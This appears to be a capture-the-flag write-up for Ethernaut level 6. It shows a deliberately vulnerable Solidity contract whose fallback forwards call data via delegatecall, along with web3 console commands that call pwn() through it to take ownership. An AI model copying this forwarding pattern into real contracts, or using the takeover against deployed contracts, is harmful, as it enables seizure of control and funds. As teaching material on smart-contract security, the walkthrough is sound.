This is the level 6 of Ethernaut game.

Pre-requisites

• delegatecall in Solidity

Hack

Given contracts:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Delegate {

  address public owner;

  constructor(address _owner) public {
    owner = _owner;
  }

  function pwn() public {
    owner = msg.sender;
  }
}

contract Delegation {

  address public owner;
  Delegate delegate;

  constructor(address _delegateAddress) public {
    delegate = Delegate(_delegateAddress);
    owner = msg.sender;
  }

  fallback() external {
    (bool result,) = address(delegate).delegatecall(msg.data);
    if (result) {
      this;
    }
  }
}

player has to claim ownership of provided instance of Delegation contract.

A simple one if you clearly understand how delegatecall works, which is being used in fallback method of Delegation.

We just have to send function signature of pwn method of Delegate as msg.data to fallback so that code of Delegate is executed in the context of Delegation. That changes the ownership of Delegation.

So, first get encoded function signature of pwn, in console:

signature = web3.eth.abi.encodeFunctionSignature("pwn()")

Then we send a transaction with signature as data, so that fallback gets called:

await contract.sendTransaction({ from: player, data: signature })

After transaction is successfully mined player is the owner of Delegation. Verify by:

await contract.owner() === player

// Output: true

That's it.

Learned something awesome? Consider starring the github repo 😄

and following me on twitter here 🙏